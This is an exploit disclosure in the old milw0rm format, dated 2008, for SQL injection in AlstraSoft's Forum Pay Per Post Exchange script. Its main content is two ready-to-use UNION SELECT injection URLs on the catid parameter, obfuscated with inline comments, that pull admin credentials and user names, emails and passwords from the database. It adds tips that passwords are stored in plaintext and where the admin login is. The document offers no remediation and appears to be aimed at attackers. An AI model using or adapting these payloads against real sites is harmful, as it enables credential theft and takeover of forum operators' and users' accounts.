--==+================================================================================+==--
--==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://alstrasoft.com/forum-pay-per-post-exchange.htm
DORK: N/A
DESCRIPTION:
pull admin/user info from the database
EXPLOITS:
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(auser,0x3a,apass),7/**/FROM/**/admin/*
www.site.com/index.php?menu=forum_catview&catid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,concat(username,0x3a,uemail,0x3a,upass),7/**/FROM/**/users/*
NOTE/TIP:
passwords are in plaintext.
admin login is at /admin/
GREETZ: milw0rm.com, h4ck-y0u.org !
--==+================================================================================+==--
--==+ Forum Pay Per Post SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--
# milw0rm.com [2008-01-21]